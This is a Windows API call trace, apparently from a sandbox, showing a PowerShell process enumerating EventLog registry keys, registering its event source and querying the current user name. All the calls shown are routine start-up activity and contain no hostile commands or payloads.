	[0681.432] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x2, lpName=0x2a4bb0, lpcchName=0x12d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.432] CoTaskMemFree (pv=0x2a4bb0) 
	[0681.432] CoTaskMemFree (pv=0x0) 
	[0681.432] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0681.432] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x3, lpName=0x2a4bb0, lpcchName=0x12d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.432] CoTaskMemFree (pv=0x2a4bb0) 
	[0681.432] CoTaskMemFree (pv=0x0) 
	[0681.432] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0681.432] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x4, lpName=0x2a4bb0, lpcchName=0x12d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.432] CoTaskMemFree (pv=0x2a4bb0) 
	[0681.432] CoTaskMemFree (pv=0x0) 
	[0681.432] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0681.432] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x5, lpName=0x2a4bb0, lpcchName=0x12d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.433] CoTaskMemFree (pv=0x2a4bb0) 
	[0681.433] CoTaskMemFree (pv=0x0) 
	[0681.433] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0681.433] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x6, lpName=0x2a4bb0, lpcchName=0x12d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.433] CoTaskMemFree (pv=0x2a4bb0) 
	[0681.433] CoTaskMemFree (pv=0x0) 
	[0681.433] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0681.433] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x7, lpName=0x2a4bb0, lpcchName=0x12d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.433] CoTaskMemFree (pv=0x2a4bb0) 
	[0681.433] CoTaskMemFree (pv=0x0) 
	[0681.433] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0681.433] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x8, lpName=0x2a4bb0, lpcchName=0x12d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.433] CoTaskMemFree (pv=0x2a4bb0) 
	[0681.433] CoTaskMemFree (pv=0x0) 
	[0681.433] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x33c) returned 0x0
	[0681.434] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x0) returned 0x2
	[0681.434] RegOpenKeyExW (in: hKey=0x338, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x340) returned 0x0
	[0681.434] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x0) returned 0x2
	[0681.434] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x344) returned 0x0
	[0681.434] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x0) returned 0x2
	[0681.434] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x348) returned 0x0
	[0681.434] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x0) returned 0x2
	[0681.434] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x34c) returned 0x0
	[0681.435] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x0) returned 0x2
	[0681.435] RegOpenKeyExW (in: hKey=0x338, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x350) returned 0x0
	[0681.435] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x0) returned 0x2
	[0681.435] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x354) returned 0x0
	[0681.435] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x0) returned 0x2
	[0681.435] RegOpenKeyExW (in: hKey=0x338, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x358) returned 0x0
	[0681.435] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x0) returned 0x2
	[0681.435] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x35c) returned 0x0
	[0681.435] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x360) returned 0x0
	[0681.436] RegCloseKey (hKey=0x360) returned 0x0
	[0681.436] RegCloseKey (hKey=0x338) returned 0x0
	[0681.436] RegCloseKey (hKey=0x35c) returned 0x0
	[0681.437] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5a8 | out: phkResult=0x12d5a8*=0x35c) returned 0x0
	[0681.437] RegQueryInfoKeyW (in: hKey=0x35c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d51c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d518, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d51c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d518*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.437] CoTaskMemFree (pv=0x0) 
	[0681.437] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0681.437] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x0, lpName=0x2a4bb0, lpcchName=0x12d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.437] CoTaskMemFree (pv=0x2a4bb0) 
	[0681.437] CoTaskMemFree (pv=0x0) 
	[0681.437] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0681.437] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x1, lpName=0x2a4bb0, lpcchName=0x12d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.438] CoTaskMemFree (pv=0x2a4bb0) 
	[0681.438] CoTaskMemFree (pv=0x0) 
	[0681.438] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0681.438] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x2, lpName=0x2a4bb0, lpcchName=0x12d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.438] CoTaskMemFree (pv=0x2a4bb0) 
	[0681.438] CoTaskMemFree (pv=0x0) 
	[0681.438] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0681.438] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x3, lpName=0x2a4bb0, lpcchName=0x12d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.438] CoTaskMemFree (pv=0x2a4bb0) 
	[0681.438] CoTaskMemFree (pv=0x0) 
	[0681.438] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0681.438] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x4, lpName=0x2a4bb0, lpcchName=0x12d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.438] CoTaskMemFree (pv=0x2a4bb0) 
	[0681.438] CoTaskMemFree (pv=0x0) 
	[0681.438] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0681.438] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x5, lpName=0x2a4bb0, lpcchName=0x12d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.439] CoTaskMemFree (pv=0x2a4bb0) 
	[0681.439] CoTaskMemFree (pv=0x0) 
	[0681.439] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0681.439] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x6, lpName=0x2a4bb0, lpcchName=0x12d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.439] CoTaskMemFree (pv=0x2a4bb0) 
	[0681.439] CoTaskMemFree (pv=0x0) 
	[0681.439] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0681.439] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x7, lpName=0x2a4bb0, lpcchName=0x12d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.439] CoTaskMemFree (pv=0x2a4bb0) 
	[0681.439] CoTaskMemFree (pv=0x0) 
	[0681.439] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0681.439] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x8, lpName=0x2a4bb0, lpcchName=0x12d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.439] CoTaskMemFree (pv=0x2a4bb0) 
	[0681.439] CoTaskMemFree (pv=0x0) 
	[0681.439] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x338) returned 0x0
	[0681.440] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x0) returned 0x2
	[0681.440] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x360) returned 0x0
	[0681.440] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x0) returned 0x2
	[0681.440] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x364) returned 0x0
	[0681.440] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x0) returned 0x2
	[0681.440] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x368) returned 0x0
	[0681.440] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x0) returned 0x2
	[0681.440] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x36c) returned 0x0
	[0681.440] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x0) returned 0x2
	[0681.441] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x370) returned 0x0
	[0681.441] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x0) returned 0x2
	[0681.441] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x374) returned 0x0
	[0681.441] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x0) returned 0x2
	[0681.441] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x378) returned 0x0
	[0681.441] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x0) returned 0x2
	[0681.441] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x37c) returned 0x0
	[0681.441] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d608 | out: phkResult=0x12d608*=0x380) returned 0x0
	[0681.442] RegCloseKey (hKey=0x380) returned 0x0
	[0681.442] RegCloseKey (hKey=0x35c) returned 0x0
	[0681.442] RegCloseKey (hKey=0x37c) returned 0x0
	[0681.443] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d578 | out: phkResult=0x12d578*=0x37c) returned 0x0
	[0681.443] RegQueryInfoKeyW (in: hKey=0x37c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d4ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d4e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d4ec*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d4e8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.443] CoTaskMemFree (pv=0x0) 
	[0681.443] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0681.443] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x0, lpName=0x2a4bb0, lpcchName=0x12d578, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d578, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.443] CoTaskMemFree (pv=0x2a4bb0) 
	[0681.443] CoTaskMemFree (pv=0x0) 
	[0681.444] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0681.444] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x1, lpName=0x2a4bb0, lpcchName=0x12d578, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d578, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.444] CoTaskMemFree (pv=0x2a4bb0) 
	[0681.444] CoTaskMemFree (pv=0x0) 
	[0681.444] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0681.444] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x2, lpName=0x2a4bb0, lpcchName=0x12d578, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d578, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.444] CoTaskMemFree (pv=0x2a4bb0) 
	[0681.444] CoTaskMemFree (pv=0x0) 
	[0681.444] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0681.444] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x3, lpName=0x2a4bb0, lpcchName=0x12d578, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d578, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.444] CoTaskMemFree (pv=0x2a4bb0) 
	[0681.444] CoTaskMemFree (pv=0x0) 
	[0681.444] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0681.444] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x4, lpName=0x2a4bb0, lpcchName=0x12d578, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d578, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.444] CoTaskMemFree (pv=0x2a4bb0) 
	[0681.444] CoTaskMemFree (pv=0x0) 
	[0681.445] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0681.445] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x5, lpName=0x2a4bb0, lpcchName=0x12d578, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d578, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.445] CoTaskMemFree (pv=0x2a4bb0) 
	[0681.445] CoTaskMemFree (pv=0x0) 
	[0681.445] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0681.445] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x6, lpName=0x2a4bb0, lpcchName=0x12d578, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d578, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.445] CoTaskMemFree (pv=0x2a4bb0) 
	[0681.445] CoTaskMemFree (pv=0x0) 
	[0681.445] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0681.445] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x7, lpName=0x2a4bb0, lpcchName=0x12d578, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d578, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.445] CoTaskMemFree (pv=0x2a4bb0) 
	[0681.445] CoTaskMemFree (pv=0x0) 
	[0681.445] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0681.445] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x8, lpName=0x2a4bb0, lpcchName=0x12d578, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d578, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.445] CoTaskMemFree (pv=0x2a4bb0) 
	[0681.446] CoTaskMemFree (pv=0x0) 
	[0681.446] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5d8 | out: phkResult=0x12d5d8*=0x35c) returned 0x0
	[0681.446] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5d8 | out: phkResult=0x12d5d8*=0x0) returned 0x2
	[0681.446] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5d8 | out: phkResult=0x12d5d8*=0x380) returned 0x0
	[0681.446] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5d8 | out: phkResult=0x12d5d8*=0x0) returned 0x2
	[0681.446] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5d8 | out: phkResult=0x12d5d8*=0x384) returned 0x0
	[0681.446] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5d8 | out: phkResult=0x12d5d8*=0x0) returned 0x2
	[0681.446] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5d8 | out: phkResult=0x12d5d8*=0x388) returned 0x0
	[0681.446] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5d8 | out: phkResult=0x12d5d8*=0x0) returned 0x2
	[0681.446] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5d8 | out: phkResult=0x12d5d8*=0x38c) returned 0x0
	[0681.447] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5d8 | out: phkResult=0x12d5d8*=0x0) returned 0x2
	[0681.447] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5d8 | out: phkResult=0x12d5d8*=0x390) returned 0x0
	[0681.447] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5d8 | out: phkResult=0x12d5d8*=0x0) returned 0x2
	[0681.447] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5d8 | out: phkResult=0x12d5d8*=0x394) returned 0x0
	[0681.447] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5d8 | out: phkResult=0x12d5d8*=0x0) returned 0x2
	[0681.447] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5d8 | out: phkResult=0x12d5d8*=0x398) returned 0x0
	[0681.447] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5d8 | out: phkResult=0x12d5d8*=0x0) returned 0x2
	[0681.447] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5d8 | out: phkResult=0x12d5d8*=0x39c) returned 0x0
	[0681.448] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5d8 | out: phkResult=0x12d5d8*=0x3a0) returned 0x0
	[0681.448] RegCloseKey (hKey=0x3a0) returned 0x0
	[0681.448] RegCloseKey (hKey=0x37c) returned 0x0
	[0681.448] RegCloseKey (hKey=0x39c) returned 0x0
	[0683.178] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b890008
	[0685.752] ReportEventW (hEventLog=0x1b890008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33b7d98*="WSMan", lpRawData=0x33b7b08) returned 1
	[0685.753] CoTaskMemAlloc (cb=0x104) returned 0x31a200
	[0685.753] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0685.753] CoTaskMemFree (pv=0x31a200) 
	[0685.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0685.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0685.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0685.756] CoTaskMemAlloc (cb=0x804) returned 0x1b7cd590
	[0685.756] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7cd590, nSize=0x12d868 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d868) returned 0x1
	[0685.756] CoTaskMemFree (pv=0x1b7cd590) 
	[0685.756] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0685.756] GetUserNameW (in: lpBuffer=0x2a4bb0, pcbBuffer=0x12d8a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d8a8) returned 1
	[0685.756] CoTaskMemFree (pv=0x2a4bb0) 
	[0685.757] ReportEventW (hEventLog=0x1b890008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33bd2d0*="Alias", lpRawData=0x33bd060) returned 1
	[0685.758] CoTaskMemAlloc (cb=0x104) returned 0x31a200
